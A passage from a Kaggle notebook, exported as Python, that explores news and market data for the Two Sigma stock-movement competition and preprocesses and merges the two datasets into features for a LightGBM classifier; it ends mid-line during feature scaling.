0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "django.shortcuts.render", "line_number": 12, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 16, "usage_type": "call"}, {"api_name": "django.views.generic.View", "line_number": 19, "usage_type": "name"}, {"api_name": "forms.GraphifyForm", "line_number": 20, "usage_type": "name"}, {"api_name": "django.shortcuts.render", "line_number": 30, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 47, "usage_type": "call"}, {"api_name": "string.punctuation", "line_number": 53, "usage_type": "attribute"}, {"api_name": "collections.OrderedDict", "line_number": 78, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 92, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 93, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 95, "usage_type": "call"}]}
+{"seq_id": "10146213215", "text": "#!/usr/bin/env python\n# coding: utf-8\n\n# # Complete EDA + features engineering + voting LightGBM\n# Nguyen Dang Minh, PhD\n# \n# * [Loading the data](#load_data)\n# * [Exploring news data](#explore_news)\n# * [Exploring market data](#explore_market)\n# * [Preprocessing](#preprocessing)\n# * [Features engineering](#feature_engineering)\n# * [Building model](#building_model)\n# * [Making submission](#making_submission)\n\n# In this notebook, I will present my statistical analysis on both the news and market data of the Kaggle problem: [Using News to Predict Stock Movements](http://https://www.kaggle.com/c/two-sigma-financial-news)\n\n# In[ ]:\n\n\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport seaborn as sns\n\nimport datetime\nimport matplotlib.pyplot as plt\nimport matplotlib\nimport re\nfrom scipy import stats\n\nmatplotlib.rcParams['figure.figsize'] = (10, 5)\nmatplotlib.rcParams['font.size'] = 12\n\nimport random\nrandom.seed(1)\nimport time\n\nimport xgboost as xgb\nimport lightgbm as lgb\nfrom sklearn.model_selection import train_test_split, GridSearchCV, RandomizedSearchCV\nfrom sklearn.metrics import get_scorer\nfrom sklearn.metrics import f1_score\nfrom sklearn.preprocessing import LabelEncoder\nfrom sklearn.metrics import accuracy_score\nfrom sklearn.ensemble import VotingClassifier\nimport lightgbm as lgb\nfrom sklearn.externals.joblib import Parallel, delayed\nfrom sklearn.base import clone\n\nimport pickle\n\n# In[ ]:\n\n\nimport warnings\nwarnings.filterwarnings('ignore')\n\n# In[ ]:\n\n\nmatplotlib.rcParams['figure.figsize'] = (10, 5)\nmatplotlib.rcParams['font.size'] = 12\n\n# In[ ]:\n\n\nfrom kaggle.competitions import twosigmanews\n# You can only call make_env() once, so don't lose it!\nenv = twosigmanews.make_env()\nprint('Done!')\n\n# \n# \n# ## Load the data\n\n# In[ ]:\n\n\n(market_train_orig, news_train_orig) = env.get_training_data()\n\n# In[ ]:\n\n\nmarket_train_df = market_train_orig.copy()\nnews_train_df = news_train_orig.copy()\nprint('Market train shape: ',market_train_df.shape)\nprint('News train shape: ', news_train_df.shape)\n\n# In[ ]:\n\n\nmarket_train_df.describe()\n\n# In[ ]:\n\n\nnews_train_df.describe()\n\n# \n# \n# ## Explore news data\n\n# ### Evolutions over time\n\n# In[ ]:\n\n\n# Sort values by time then extract date\nnews_train_df = news_train_df.sort_values(by='time')\nnews_train_df['date'] = news_train_df['time'].dt.date\n\n# In[ ]:\n\n\n# Function to plot time series data\ndef plot_vs_time(data_frame, column, calculation='mean', span=10):\n if calculation == 'mean':\n group_temp = data_frame.groupby('date')[column].mean().reset_index()\n if calculation == 'count':\n group_temp = data_frame.groupby('date')[column].count().reset_index()\n if calculation == 'nunique':\n group_temp = data_frame.groupby('date')[column].nunique().reset_index()\n group_temp = group_temp.ewm(span=span).mean()\n fig = plt.figure(figsize=(10,3))\n plt.plot(group_temp['date'], group_temp[column])\n plt.xlabel('Time')\n plt.ylabel(column)\n plt.title('%s versus time' %column)\n\n# In[ ]:\n\n\nplot_vs_time(news_train_df, 'sourceId', calculation='count', span=10)\nplt.title('News count vs time')\nplt.ylabel('Count')\n\n# There is a maximum peak every quarter (time for quaterly financial report) and a minimum peak at the end of the year (time for Christmast holliday.)\n\n# In[ ]:\n\n\n# Plot time evolution of several parameters\n\ncolumns = ['urgency', 'takeSequence', 'companyCount','marketCommentary','sentenceCount',\\\n 'firstMentionSentence','relevance','sentimentClass','sentimentWordCount','noveltyCount24H', 'volumeCounts24H']\n\nfor column in columns:\n plot_vs_time(news_train_df, column)\n\n# ### Time delay\n\n# In[ ]:\n\n\ntime_delay = (pd.to_datetime(news_train_df['time']) - pd.to_datetime(news_train_df['firstCreated']))\ntime_delay_log10 = np.log10(time_delay.dt.total_seconds()/60+1)\n\n# In[ ]:\n\n\nplt.hist(time_delay_log10, bins=np.arange(0,2.5,0.25), rwidth=0.7)\nplt.xlabel('$Log_{10}$(Time delay in minutes +1)')\nplt.ylabel('Counts')\nplt.title('Delay time distribution')\n\n# In[ ]:\n\n\ntime_delay_min = time_delay.dt.total_seconds()/60\ntime_delay_df = time_delay_min.to_frame().join(news_train_df['date'].to_frame())\ntime_delay_df.columns = ['delay','date']\nplot_vs_time(time_delay_df, 'delay')\nplt.ylabel('Delay (minutes)')\n\n# ### Urgency\n\n# In[ ]:\n\n\nurgency_count = news_train_df.groupby('urgency')['sourceId'].count()\nurgency_count = urgency_count/urgency_count.sum()\nprint('Urgency ratio')\nurgency_count.sort_values(ascending=True)\ndel urgency_count\n\n# ### Take sequence\n\n# In[ ]:\n\n\ntake_sequence = news_train_df.groupby('takeSequence')['sourceId'].count()\n\n# In[ ]:\n\n\ntake_sequence = take_sequence.sort_values(ascending= False)\ntake_sequence[:10].plot.barh()\nplt.xlabel('Count')\nplt.ylabel('Take sequence')\nplt.title('Top 10 take sequence')\nplt.gca().invert_yaxis()\ndel take_sequence\n\n# ### Providers\n\n# In[ ]:\n\n\nprovider_count = news_train_df.groupby('provider')['sourceId'].count()\n\n# In[ ]:\n\n\nprovider_sort = provider_count.sort_values(ascending= False)\nprovider_sort[:10].plot.barh()\nplt.xlabel('Count')\nplt.ylabel('Provider')\nplt.title('Top 10 news provider')\nplt.gca().invert_yaxis()\ndel provider_count\n\n# ### Subjects\n\n# In[ ]:\n\n\n# Extract data from a single cell\ndef contents_to_list(contents):\n text = contents[1:-1]\n text = re.sub(r\",\",' ',text)\n text = re.sub(r\"'\",\"\", text)\n text_list = text.split(' ')\n return text_list\n\n# Put data from columns into dict\ndef get_content_dict(content_column):\n content_dict = {}\n for i in range(len(content_column)):\n this_cell = content_column[i]\n content_list = contents_to_list(this_cell) \n for content in content_list:\n if content in content_dict.keys():\n content_dict[content] += 1\n else:\n content_dict[content] = 1\n return content_dict\n\n\n# In[ ]:\n\n\nsubjects = news_train_df.sample(n=10000, random_state=1)['subjects']\nsubjects_dict = get_content_dict(subjects)\n\n# In[ ]:\n\n\nsubjects_df = pd.Series(subjects_dict).sort_values(ascending=False)\nsubjects_df[:15].plot.barh()\nplt.ylabel('Subjects')\nplt.xlabel('Counts')\nplt.title('Top subjects for 10k data')\nplt.gca().invert_yaxis()\ndel subjects_df\n\n# ### Audiences\n\n# In[ ]:\n\n\naudiences = news_train_df.sample(n=10000, random_state=1)['audiences']\naudiences_dict = get_content_dict(audiences)\n\n# In[ ]:\n\n\naudiences_df = pd.Series(audiences_dict).sort_values(ascending=False)\naudiences_df[:15].plot.barh()\nplt.ylabel('Audiences')\nplt.xlabel('Counts')\nplt.title('Top audiences for 10k data')\nplt.gca().invert_yaxis()\n\n# ### Company Count\n\n# In[ ]:\n\n\nnews_train_df['companyCount'].hist(bins=np.arange(0,30,1))\nplt.xlabel('Company count')\nplt.title('Company count distribution')\n\n# ### Head line tag\n\n# In[ ]:\n\n\nhead_line = news_train_df.groupby('headlineTag')['sourceId'].count()\n\n# In[ ]:\n\n\nhead_line_sort = head_line.sort_values(ascending= False)\nhead_line_sort[:10].plot.barh()\nplt.xlabel('Count')\nplt.ylabel('Head line')\nplt.title('Top 10 head lines')\nplt.gca().invert_yaxis()\ndel head_line\n\n# Most headlines are blank. This properties may not be important.\n\n# ### First sentence - Urgency - relevance - sentiment Word Count\n\n# **First sentence and urgency**\n\n# In[ ]:\n\n\nnews_train_df['firstMentionSentence'].hist(bins=np.arange(0,20,1))\nplt.xlabel('First mention sentence')\nplt.ylabel('Count')\nplt.title('First mention sentence distribution')\n\n# In[ ]:\n\n\nsentence_urgency = news_train_df.groupby('firstMentionSentence')['urgency'].mean()\nsentence_urgency.head(5)\ndel sentence_urgency\n\n# **First sentence and relevance**\n\n# In[ ]:\n\n\nnews_train_df['relevance'].hist(bins=np.arange(0,1.01,0.05))\nplt.xlabel('Relevance')\nplt.ylabel('Count')\nplt.title('Relevance distribution')\n\n# In[ ]:\n\n\nsentence_relevance = news_train_df.groupby('firstMentionSentence')['relevance'].mean()\nsentence_relevance[:15].plot.barh()\nplt.xlabel('Relevance')\nplt.title('Relevance by sentence')\nplt.gca().invert_yaxis()\ndel sentence_relevance\n\n# **Sentiment word count and relevance**\n\n# In[ ]:\n\n\nsentimentWordCount = news_train_df.groupby('sentimentWordCount')['sourceId'].count().reset_index()\nplt.plot(sentimentWordCount['sentimentWordCount'], sentimentWordCount['sourceId'])\nplt.xlim(0,300)\nplt.xlabel('Sentiment words count')\nplt.ylabel('Count')\nplt.title('Sentiment words count distribution')\ndel sentimentWordCount\n\n# In[ ]:\n\n\nsentimentWordRatio = news_train_df.groupby('sentimentWordCount')['relevance'].mean()\nplt.plot(sentimentWordRatio)\nplt.xlim(0,2000)\nplt.ylabel('Relevance')\nplt.xlabel('Sentiment word count')\nplt.title('Sentiment word count and relevance')\ndel sentimentWordRatio\n\n# **Sentiment ratio**\n\n# In[ ]:\n\n\nnews_train_df['sentimentRatio'] = news_train_df['sentimentWordCount']/news_train_df['wordCount']\nnews_train_df['sentimentRatio'].hist(bins=np.linspace(0,1.001,40))\nplt.xlabel('Sentiment ratio')\nplt.ylabel('Count')\nplt.title('Sentiment ratio distribution')\n\n# In[ ]:\n\n\nnews_train_df.sample(n=10000, random_state=1).plot.scatter('sentimentRatio', 'relevance')\nplt.title('Relevance vs sentiment ratio of 10k samples')\n\n# ### Asset name\n\n# In[ ]:\n\n\nasset_name = news_train_df.groupby('assetName')['sourceId'].count()\nprint('Total number of assets: ',news_train_df['assetName'].nunique())\n\n# In[ ]:\n\n\nasset_name = asset_name.sort_values(ascending=False)\nasset_name[:10].plot.barh()\nplt.gca().invert_yaxis()\nplt.xlabel('Count')\nplt.title('Top 10 assets news')\n\n# In[ ]:\n\n\nfor i, j in zip([-1, 0, 1], ['negative', 'neutral', 'positive']):\n df_sentiment = news_train_df.loc[news_train_df['sentimentClass'] == i, 'assetName']\n print(f'Top mentioned companies for {j} sentiment are:')\n print(df_sentiment.value_counts().head(5))\n print('')\n\n# ### Remove outliers and plot correlation\n\n# In[ ]:\n\n\n# Function to remove outliers\ndef remove_outliers(data_frame, column_list, low=0.02, high=0.98):\n temp_frame = data_frame\n for column in column_list:\n this_column = data_frame[column]\n quant_df = this_column.quantile([low,high])\n low_limit = quant_df[low]\n high_limit = quant_df[high]\n temp_frame[column] = data_frame[column].clip(lower=low_limit, upper=high_limit)\n return temp_frame\n\n# In[ ]:\n\n\n# Remove outlier\ncolumns_outlier = ['takeSequence', 'bodySize', 'sentenceCount', 'wordCount', 'sentimentWordCount', 'firstMentionSentence','noveltyCount12H',\\\n 'noveltyCount24H', 'noveltyCount3D', 'noveltyCount5D', 'noveltyCount7D', 'volumeCounts12H', 'volumeCounts24H',\\\n 'volumeCounts3D','volumeCounts5D','volumeCounts7D']\nnews_rmv_outlier = remove_outliers(news_train_df, columns_outlier)\n\n# In[ ]:\n\n\n# Plot correlation\ncolumns_corr = ['urgency', 'takeSequence', 'companyCount','marketCommentary','sentenceCount',\\\n 'firstMentionSentence','relevance','sentimentClass','sentimentWordCount','noveltyCount24H',\\\n 'noveltyCount3D', 'noveltyCount5D', 'noveltyCount7D','volumeCounts24H','volumeCounts3D','volumeCounts5D','volumeCounts7D']\ncolormap = plt.cm.RdBu\nplt.figure(figsize=(18,15))\nsns.heatmap(news_rmv_outlier[columns_corr].astype(float).corr(), linewidths=0.1, vmax=1.0, vmin=-1., square=True, cmap=colormap, linecolor='white', annot=True)\nplt.title('Pair-wise correlation')\n\n# \n# \n# ## Explore market data\n\n# In[ ]:\n\n\nprint('Check null data:')\nmarket_train_df.isna().sum()\n\n# **Some preprocessing:**\n# * Sort data in chronological order\n# * All NAN data comes from the market adjusted column. We fill them up with the raw value data\n\n# In[ ]:\n\n\n# Sort data\nmarket_train_df = market_train_df.sort_values('time')\nmarket_train_df['date'] = market_train_df['time'].dt.date\n\n# Fill nan\nmarket_train_fill = market_train_df\ncolumn_market = ['returnsClosePrevMktres1','returnsOpenPrevMktres1','returnsClosePrevMktres10', 'returnsOpenPrevMktres10']\ncolumn_raw = ['returnsClosePrevRaw1', 'returnsOpenPrevRaw1','returnsClosePrevRaw10', 'returnsOpenPrevRaw10']\nfor i in range(len(column_raw)):\n market_train_fill[column_market[i]] = market_train_fill[column_market[i]].fillna(market_train_fill[column_raw[i]])\n\n# ### Plot data versus time\n\n# In[ ]:\n\n\nplot_vs_time(market_train_fill, 'assetCode', 'count')\nplt.title('Number of asset codes versus time')\n\n# In[ ]:\n\n\n# Inspired by https://www.kaggle.com/artgor/eda-feature-engineering-and-everything\nfor i in [0.05, 0.1, 0.25, 0.5, 0.75, 0.9, 0.95]:\n price_df = market_train_fill.groupby('date')['close'].quantile(i).reset_index()\n plt.plot(price_df['date'], price_df['close'], label='%.2f quantile' %i)\nplt.legend(loc='best')\nplt.xlabel('Time')\nplt.ylabel('Price')\nplt.title('Market close price by quantile')\n\n# In[ ]:\n\n\nfor i in [0.05, 0.25, 0.5, 0.75, 0.95]:\n price_df = market_train_fill.groupby('date')['returnsClosePrevRaw1'].quantile(i).reset_index()\n plt.plot(price_df['date'], price_df['returnsClosePrevRaw1'], label='%.2f quantile' %i)\nplt.legend(loc='best')\nplt.xlabel('Time')\nplt.ylabel('Value')\nplt.title('returnsClosePrevRaw1 by quantile')\n\n\n# In[ ]:\n\n\nfor i in [0.05, 0.25, 0.5, 0.75, 0.95]:\n price_df = market_train_fill.groupby('date')['returnsOpenPrevRaw10'].quantile(i).reset_index()\n plt.plot(price_df['date'], price_df['returnsOpenPrevRaw10'], label='%.2f quantile' %i)\nplt.legend(loc=1)\nplt.xlabel('Time')\nplt.ylabel('Value')\nplt.title('returnsOpenPrevRaw10 by quantiles')\n\n# In[ ]:\n\n\nfor i in [0.05, 0.25, 0.5, 0.75, 0.95]:\n price_df = market_train_fill.groupby('date')['returnsOpenPrevMktres10'].quantile(i).reset_index()\n plt.plot(price_df['date'], price_df['returnsOpenPrevMktres10'], label='%.2f quantile' %i)\nplt.legend(loc=1)\nplt.xlabel('Time')\nplt.ylabel('Value')\nplt.title('returnsOpenPrevMktres10 by quantiles')\n\n# In[ ]:\n\n\nfor i in [0.05, 0.25, 0.5, 0.75, 0.95]:\n price_df = market_train_fill.groupby('date')['returnsOpenNextMktres10'].quantile(i).reset_index()\n plt.plot(price_df['date'], price_df['returnsOpenNextMktres10'], label='%.2f quantile' %i)\nplt.legend(loc=1)\nplt.xlabel('Time')\nplt.ylabel('Value')\nplt.title('returnsOpenNextMktres10 by quantiles')\n\n# In[ ]:\n\n\nfor i in [0.05, 0.25, 0.5, 0.75, 0.95]:\n price_df = market_train_fill.groupby('date')['volume'].quantile(i).reset_index()\n plt.plot(price_df['date'], price_df['volume'], label='%.2f quantile' %i)\nplt.legend(loc='best')\nplt.xlabel('Time')\nplt.ylabel('Volumes')\nplt.title('Market trade volumes by quantile')\n\n# ### Difference between raw values and market adjusted values\n# \n# Let see if there's any difference between raw return and market adjusted return\n\n# In[ ]:\n\n\ncolumn_mkt_raw_diff = []\nfor i in range(len(column_market)):\n this_raw = column_raw[i]\n this_market = column_market[i]\n new_column_name = 'mkt_raw_diff'+this_raw.replace('returns','').replace('Raw','')\n column_mkt_raw_diff.append(new_column_name)\n market_train_fill[new_column_name] = market_train_fill[this_market] - market_train_fill[this_raw]\n\n# In[ ]:\n\n\nmarket_train_fill[column_mkt_raw_diff].describe()\n\n# The difference between raw return and market adjusted returns are negligible, but there are some extreme values. Those values are noise and needs to be taken care of\n\n# ### Asset codes\n\n# In[ ]:\n\n\nassetCode_df = market_train_df.groupby('assetCode')['volume'].sum().sort_values(ascending=False)\nprint('There are %i unique asset code' %len(assetCode_df))\n\n# In[ ]:\n\n\nunknown_name = market_train_fill[market_train_fill['assetName']=='Unknown']\nunknown_count = unknown_name['assetCode'].value_counts().sort_values(ascending=False)\n\n# In[ ]:\n\n\nprint('There are %i unique asset code with unknown asset name' %len(unknown_count))\n\n# In[ ]:\n\n\nunknown_count[:15].plot.barh()\nplt.ylabel('assetCode')\nplt.xlabel('Counts')\nplt.title('Top 15 asset code with Unknown asset name')\nplt.gca().invert_yaxis()\n\n# In[ ]:\n\n\nassetCode_df[:15].plot.barh()\nplt.ylabel('assetCode')\nplt.xlabel('Trading volume')\nplt.title('Top 15 asset code by volume')\nplt.gca().invert_yaxis()\n\n# ### Asset Name\n\n# In[ ]:\n\n\nassetName_Volume = market_train_df.groupby('assetName')['volume'].sum().sort_values(ascending=False)\nassetName_Volume[:15].plot.barh()\nplt.ylabel('assetName')\nplt.xlabel('Trading volume')\nplt.title('Top 15 asset name by volume')\nplt.gca().invert_yaxis()\ndel assetName_Volume\n\n# The volume ranking by coorperation seems to be the same as the rank of asset codes they own, e.g. the one with most popular codes has the most trading volume\n\n# In[ ]:\n\n\nassetName_code = market_train_df.groupby('assetName')['assetCode'].nunique().reset_index().sort_values(by='assetCode',ascending=False)\n\n# In[ ]:\n\n\nassetCodeCount = assetName_code.groupby('assetCode')['assetName'].count().reset_index()\nassetCodeCount.columns = ['assetCodeNo', 'counts']\nassetCodeCount.head()\ndel assetCodeCount\n\n# **The vast majority of companies has only one asset code**. One '*company*' that has 110 actually is the 'Unknown' category. Magically, some companies don't even have any asset code. Currently I have no explanation for this.\n\n# ### Correlations\n\n# In[ ]:\n\n\ncolumns_corr_market = ['volume', 'open', 'close','returnsClosePrevRaw1','returnsOpenPrevRaw1',\\\n 'returnsClosePrevMktres1','returnsOpenPrevMktres1','returnsClosePrevMktres10','returnsOpenPrevRaw10',\\\n 'returnsClosePrevMktres10', 'returnsOpenPrevMktres10', 'returnsOpenNextMktres10']\ncolormap = plt.cm.RdBu\nplt.figure(figsize=(18,15))\nsns.heatmap(market_train_fill[columns_corr_market].astype(float).corr(), linewidths=0.1, vmax=1.0, vmin=-1., square=True, cmap=colormap, linecolor='white', annot=True)\nplt.title('Pair-wise correlation')\n\n# ### Dig deeper to a single asset\n# \n# Let's take a closer look to a single asset. Here I choose the one with largest trading volumen: 'Bank of America Corp'\n\n# In[ ]:\n\n\nassetCode = 'Bank of America Corp'\nthisAssetMark_df = market_train_fill[market_train_fill['assetName']==assetCode].sort_values(by='date',ascending=True) \nthisAssetMark_df['diff_open_close'] = thisAssetMark_df['open'] - thisAssetMark_df['close']\nthisAssetNews_df = news_rmv_outlier[news_rmv_outlier['assetName']==assetCode]\n# Trading volume vs time\nthisAssetMark_df.plot(x='date', y='volume')\nplt.title('Trading volume vs time')\n# Price vs time\nthisAssetMark_df.plot(x='date', y='open')\nplt.title('Open price vs time')\n# Return vs time\nthisAssetMark_df.plot(x='date', y=['returnsOpenPrevRaw1', 'returnsOpenPrevRaw10','returnsOpenNextMktres10'], alpha=0.8)\nplt.title('Return vs time')\n\n# It can be seen that trading volume is strongly associated with price, i.e. trade increase when price hits bottom. Return is also strongly fluctuated at such time\n\n# In[ ]:\n\n\nnews_volume = thisAssetNews_df.groupby('date')['sourceId'].count().reset_index()\nnews_volume = news_volume.ewm(span=10).mean()\nnews_volume.plot(x='date',y='sourceId')\nplt.title('News volume vs time')\n\n# In[ ]:\n\n\nnews_urgency = thisAssetNews_df.groupby('date')['urgency'].mean().reset_index()\nnews_urgency = news_urgency.ewm(span=10).mean()\nnews_urgency.plot(x='date',y='urgency')\nplt.title('News urgency vs time')\n\n# The news increases in volumes and urgency as price drops\n\n# In[ ]:\n\n\nnews_relevance = thisAssetNews_df.groupby('date')['relevance'].mean().reset_index()\nnews_relevance = news_relevance.ewm(span=10).mean()\nnews_relevance.plot(x='date',y='relevance')\nplt.title('Relevance vs time')\n\n# In[ ]:\n\n\nnews_sentiment = thisAssetNews_df.groupby('date')['sentimentClass','sentimentNegative','sentimentNeutral','sentimentPositive'].mean().reset_index()\nnews_sentiment = news_sentiment.ewm(span=10).mean()\nnews_sentiment.plot(x='date',y=['sentimentClass','sentimentNegative','sentimentNeutral','sentimentPositive'], alpha=0.8)\nplt.title('Sentiment vs time')\n\n# Sentiments are mostly negative. Sentiment drops as price drops, which is expected.\n# \n# Now let's merge the news and market data and see their correlations\n\n# In[ ]:\n\n\n# Merge news and market data. Only keep numeric columns\nthisAssetMark_number = thisAssetMark_df[columns_corr_market+['date']]\nthisAssetMark_number = thisAssetMark_number.groupby('date').mean().reset_index()\nthisAssetNews_number = thisAssetNews_df[columns_corr+['date']]\nthisAssetNews_number = thisAssetNews_number.groupby('date').mean().reset_index()\nthisAssetNews_number['news_volume'] = thisAssetNews_df.groupby('date')['sourceId'].count().reset_index()['sourceId']\nthisAssetMerge = pd.merge(thisAssetMark_number, thisAssetNews_number, how='left', on = 'date')\n\n# In[ ]:\n\n\ncolumns_corr_merge = ['volume','open','close','returnsOpenPrevRaw1','returnsOpenPrevMktres1','returnsOpenPrevRaw10','returnsOpenPrevMktres10',\\\n 'returnsOpenNextMktres10','news_volume','urgency','sentenceCount','relevance','sentimentClass',\\\n 'noveltyCount24H','noveltyCount5D','volumeCounts24H','volumeCounts5D']\ncolormap = plt.cm.RdBu\nplt.figure(figsize=(18,15))\nsns.heatmap(thisAssetMerge[columns_corr_merge].astype(float).corr(), linewidths=0.1, vmax=1.0, vmin=-1., square=True, cmap=colormap, linecolor='white', annot=True)\nplt.title('Pair-wise correlation market and news')\n\n# This concludes the exploratory analysis. I will now proceed on data preprocessing and model building\n\n# In[ ]:\n\n\ndel thisAssetMark_df\ndel news_relevance\ndel market_train_fill\ndel news_train_df\ndel news_rmv_outlier\n\n# \n# \n# ## Preprocessing\n\n# In[ ]:\n\n\nmarket_train_orig = market_train_orig.sort_values('time')\nnews_train_orig = news_train_orig.sort_values('time')\nmarket_train_df = market_train_orig.copy()\nnews_train_df = news_train_orig.copy()\ndel market_train_orig\ndel news_train_orig\n\n# In[ ]:\n\n\nmarket_train_df = market_train_df.loc[market_train_df['time'].dt.date>=datetime.date(2009,1,1)]\nnews_train_df = news_train_df.loc[news_train_df['time'].dt.date>=datetime.date(2009,1,1)]\n\n# ### Market data\n# * **Outliers - Open to close:** the difference between open price and close price cannot be too much difference (market would corrupt otherwise). We treat these outliers by clipping the close-to-open ratio\n\n# In[ ]:\n\n\nmarket_train_df['close_open_ratio'] = np.abs(market_train_df['close']/market_train_df['open'])\nthreshold = 0.5\nprint('In %i lines price increases by 50%% or more in a day' %(market_train_df['close_open_ratio']>=1.5).sum())\nprint('In %i lines price decreases by 50%% or more in a day' %(market_train_df['close_open_ratio']<=0.5).sum())\n\n# In[ ]:\n\n\nmarket_train_df = market_train_df.loc[market_train_df['close_open_ratio'] < 1.5]\nmarket_train_df = market_train_df.loc[market_train_df['close_open_ratio'] > 0.5]\nmarket_train_df = market_train_df.drop(columns=['close_open_ratio'])\n\n# * **Fill nulls - Market values:** All null data comes from market adjusted columns. We fill them up with the raw values in the same row\n\n# In[ ]:\n\n\ncolumn_market = ['returnsClosePrevMktres1','returnsOpenPrevMktres1','returnsClosePrevMktres10', 'returnsOpenPrevMktres10']\ncolumn_raw = ['returnsClosePrevRaw1', 'returnsOpenPrevRaw1','returnsClosePrevRaw10', 'returnsOpenPrevRaw10']\nfor i in range(len(column_raw)):\n market_train_df[column_market[i]] = market_train_df[column_market[i]].fillna(market_train_df[column_raw[i]])\n\n# * **Outliers-Returns:** Return should not exceed 50% or falls below 50%. If it does, it is either noise, or extreme data that will confuse our prediction later on. We remove these extreme data.\n\n# In[ ]:\n\n\nprint('Removing outliers ...')\ncolumn_return = column_market + column_raw + ['returnsOpenNextMktres10']\norig_len = market_train_df.shape[0]\nfor column in column_return:\n market_train_df = market_train_df.loc[market_train_df[column]>=-2]\n market_train_df = market_train_df.loc[market_train_df[column]<=2]\nnew_len = market_train_df.shape[0]\nrmv_len = np.abs(orig_len-new_len)\nprint('There were %i lines removed' %rmv_len)\n\n# * **Remove strange data**: Here we remove data with unknown asset name or asset codes with strange behavior. For more details, see here: https://www.kaggle.com/nareyko/market-return-estimation-and-bad-data-detection\n\n# In[ ]:\n\n\nprint('Removing strange data ...')\norig_len = market_train_df.shape[0]\nmarket_train_df = market_train_df[~market_train_df['assetCode'].isin(['PGN.N','EBRYY.OB'])]\n#market_train_df = market_train_df[~market_train_df['assetName'].isin(['Unknown'])]\nnew_len = market_train_df.shape[0]\nrmv_len = np.abs(orig_len-new_len)\nprint('There were %i lines removed' %rmv_len)\n\n# ### News data\n# * **Remove outliers**: apply a clip filter to reduce too extreme data\n\n# In[ ]:\n\n\n# Function to remove outliers\ndef remove_outliers(data_frame, column_list, low=0.02, high=0.98):\n for column in column_list:\n this_column = data_frame[column]\n quant_df = this_column.quantile([low,high])\n low_limit = quant_df[low]\n high_limit = quant_df[high]\n data_frame[column] = data_frame[column].clip(lower=low_limit, upper=high_limit)\n return data_frame\n\n# In[ ]:\n\n\n# Remove outlier\ncolumns_outlier = ['takeSequence', 'bodySize', 'sentenceCount', 'wordCount', 'sentimentWordCount', 'firstMentionSentence','noveltyCount12H',\\\n 'noveltyCount24H', 'noveltyCount3D', 'noveltyCount5D', 'noveltyCount7D', 'volumeCounts12H', 'volumeCounts24H',\\\n 'volumeCounts3D','volumeCounts5D','volumeCounts7D']\nprint('Clipping news outliers ...')\nnews_train_df = remove_outliers(news_train_df, columns_outlier)\n\n# \n# \n# ## Features engineering\n# \n# ### Data processing function\n# Here we make a function process both market and news data, then merge them.\n# \n\n# In[ ]:\n\n\nasset_code_dict = {k: v for v, k in enumerate(market_train_df['assetCode'].unique())}\ndrop_columns = [col for col in news_train_df.columns if col not in ['sourceTimestamp', 'urgency', 'takeSequence', 'bodySize', 'companyCount', \n 'sentenceCount', 'firstMentionSentence', 'relevance','firstCreated', 'assetCodes']]\ncolumns_news = ['firstCreated','relevance','sentimentClass','sentimentNegative','sentimentNeutral',\n 'sentimentPositive','noveltyCount24H','noveltyCount7D','volumeCounts24H','volumeCounts7D','assetCodes','sourceTimestamp',\n 'assetName','audiences', 'urgency', 'takeSequence', 'bodySize', 'companyCount', \n 'sentenceCount', 'firstMentionSentence','time']\n\n# In[ ]:\n\n\n# Data processing function\ndef data_prep(market_df,news_df):\n market_df['date'] = market_df.time.dt.date\n market_df['close_to_open'] = market_df['close'] / market_df['open']\n market_df.drop(['time'], axis=1, inplace=True)\n \n news_df = news_df[columns_news]\n news_df['sourceTimestamp']= news_df.sourceTimestamp.dt.hour\n news_df['firstCreated'] = news_df.firstCreated.dt.date\n news_df['assetCodesLen'] = news_df['assetCodes'].map(lambda x: len(eval(x)))\n news_df['assetCodes'] = news_df['assetCodes'].map(lambda x: list(eval(x))[0])\n news_df['asset_sentiment_count'] = news_df.groupby(['assetName', 'sentimentClass'])['time'].transform('count')\n news_df['len_audiences'] = news_train_df['audiences'].map(lambda x: len(eval(x)))\n kcol = ['firstCreated', 'assetCodes']\n news_df = news_df.groupby(kcol, as_index=False).mean()\n market_df = pd.merge(market_df, news_df, how='left', left_on=['date', 'assetCode'], \n right_on=['firstCreated', 'assetCodes'])\n del news_df\n market_df['assetCodeT'] = market_df['assetCode'].map(asset_code_dict)\n market_df = market_df.drop(columns = ['firstCreated','assetCodes','assetName']).fillna(0) \n return market_df\n\n# In[ ]:\n\n\nprint('Merging data ...')\nmarket_train_df = data_prep(market_train_df, news_train_df)\nmarket_train_df.head()\n\n# \n# \n# ### Data selection\n# \n# Looking at the statistics, most data behave homogeneously after 2009 (volume increase, price increase, etc.). However, before 2009, due to the burst of the housing bubble that leads to the financial crisis in 2008, the data behaves differently. So the question to make the right prediction for this problem is: **Will there be a financial crisis in the next 6 months?** If the answer is **Yes**, then we include data before 2009. If the answer is **No**, then we exclude them.\n# \n# In this notebook, I choose **No** as the answer and proceed from that.\n\n# In[ ]:\n\n\nmarket_train_df = market_train_df.loc[market_train_df['date']>=datetime.date(2009,1,1)]\n\n# We then perform feature selection . Feature scaling is not needed since we plan to use lightgbm - a tree-based model, which do not require standardization.\n# \n# I tried using a regressor model, but a problem is that it gives close-to-0 values for most of prediction. Thus, I convert this problem into a classification problem: 0 for negative return and 1 for positive return\n\n# In[ ]:\n\n\nnum_columns = ['volume', 'close', 'open', 'returnsClosePrevRaw1', 'returnsOpenPrevRaw1', 'returnsClosePrevMktres1', 'returnsOpenPrevMktres1', 'returnsClosePrevRaw10', 'returnsOpenPrevRaw10', \n 'returnsClosePrevMktres10', 'returnsOpenPrevMktres10', 'close_to_open', 'sourceTimestamp', 'urgency', 'companyCount', 'takeSequence', 'bodySize', 'sentenceCount',\n 'relevance', 'sentimentClass', 'sentimentNegative', 'sentimentNeutral', 'sentimentPositive',\n 'noveltyCount24H','noveltyCount7D','volumeCounts24H','volumeCounts7D','assetCodesLen', 'asset_sentiment_count', 'len_audiences']\ncat_columns = ['assetCodeT']\nfeature_columns = num_columns+cat_columns\n\n# In[ ]:\n\n\n# Scaling of data\nfrom sklearn.preprocessing import StandardScaler, MinMaxScaler\n\ndata_scaler = StandardScaler()\n#market_train_df[num_columns] = data_scaler.fit_transform(market_train_df[num_columns])\n#data_scaler = MinMaxScaler()\nmarket_train_df[num_columns] = 